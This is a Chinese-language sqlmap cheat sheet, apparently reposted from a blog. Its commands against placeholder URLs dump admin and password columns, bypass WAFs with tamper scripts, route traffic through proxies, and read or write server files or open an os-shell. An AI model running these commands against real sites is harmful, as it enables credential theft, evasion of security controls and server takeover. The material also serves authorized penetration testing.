sqlmap命令總結


Sqlmap常規命令:


ACCESS(一個數據庫):

Sqlmap -u “http://www.xxx.com/shownews.asp?id=1” – -tables (獲取表)

Sqlmap -u “http://www.xxx.com/shownews.asp?id=1” – -columns -T 表 (獲取指定表字段內容)

Sqlmap -u “http://www.xxx.com/shownews.asp?id=1” – -dump -C “admin,password” -T 表 (下載指定數據)

MYSQL(多個數據庫):

Sqlmap -u “http://www.xxx.com/shownews.php?id=1” – -dbs (獲取數據庫)

Sqlmap -u “http://www.xxx.com/shownews.asp?id=1” – -current -db (獲取當前網站數據庫)

Sqlmap -u “http://www.xxx.com/shownews.asp?id=1” – -tables -D “數據庫” (獲取指定數據庫表)

Sqlmap -u “http://www.xxx.com/shownews.asp?id=1” – -columns -T “表” -D “庫” (獲取指定字段內容)

Sqlmap -u “http://www.xxx.com/shownews.asp?id=1” – -dump -C ”admin,password” -T “表” -D “庫”(下載指定數據)

Cookie注入:Sqlmap -u “http://www.xxx.com/shownews.asp?” – -cookie “id=1” – -level 2

POST注入:

包括兩個方面,-r參數注入 – -data參數注入

兩者區別根據具體情況選擇

-r:用burp抓包保存為1.txt在sqlmap根目錄,一般登陸框利用較多

Sqlmap.py -r “1.txt”

– -data:直接利用參數即可

sqlmap -u “http://www.xxx.com/shownews.asp?” – -data= “id=1”

偽靜態注入:

在存在注入的地方加上*,然后獲取數據庫

sqlmap.py -u “http://www.xx.com/index.php/index/view/id/40*.html” – -dbs

Sqlmap代理:

HTTP(S)代理:

參數:–proxy、–proxy-cred、–proxy-file和–ignore-proxy

使用參數“–proxy”來設置一個HTTP(S)代理,格式是“http(s)://url:port”。若代理需要認證,使用參數“–proxy-cred”來提供認證憑證,格式是“username:password”。

如:

sqlmap -u “http://www.xxx.com/shownews.asp?id=1” – -dbs – -proxy http://192.168.0.1:1080

–proxy-file:加載代理ip列表

如:sqlmap.py -u“http://www.xxx.com/shownews.asp?id=1″ -proxy-file=dl.txt(代理ip文件)

–ignore-proxy:忽略本地代理設置

–proxy http://local:8080 –threads 10 (可以自定義線程加速) 代理

Tor代理模式:這個我沒試過,就不貼語法了。

Sqlmap的tamper過waf腳本整理:

sqlmap有着兩個選項 –check-waf –identify-waf 來辨認waf

注:自己常用的腳本

space2morehash.py space2hash.py(繞過過濾‘=’) base64encode.py(用base64編碼替換)

charencode.py space2comment.py charunicodeencode.py(字符串unicode編碼) chardoubleencode.py(雙url編碼)unmagicquotes.py(寬字符繞過 GPC addslashes) randomcomments.py(用/**/分割sql關鍵字) appendnullbyte.py(在有效負荷結束位置加載零字節字符編碼)

Tamper語法:

batch:要求不對目標寫入(碰到任何提示默認回車)

tamper:使用干預腳本

-v 3(3為等級)

注意:若不使用3等級無法繼續下一步操作。

語法:sqlmap.py -u “http://www.xxx.com/shownews.asp?id=1” -v 3 – -dbs – -batch – -tamper “space2morehash.py”

注意:mysql access等數據庫的tamper腳本還是有所區別的

帶上一個大佬整理的各個數據庫對應的tamper腳本鏈接

https://blog.csdn.net/hxsstar/article/details/22782627

Sqlmap之請求延遲:

Sqlmap.py -u “http://www.xxx.com/shownews.asp?id=1” – -tables – -delay 0.5(延遲時間)

如果有網站dba權限,且可以讀取寫入文件,那么可以直接os-shell或者以下命令

– -file-read /home/www/index.php 讀取指定文件

– -file-write 寫入本地文件(- -file-write “c:\test\1.txt” – -file-dest “/home/www/feizhu.txt” 本地的1.txt文件寫入到遠程服務器feizhu.txt(此處需要有網站寫入權限)

sqlmap連接數據庫:

sqlmap.py -d mysql://test:test@localhost:3306/test –sql-shell


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM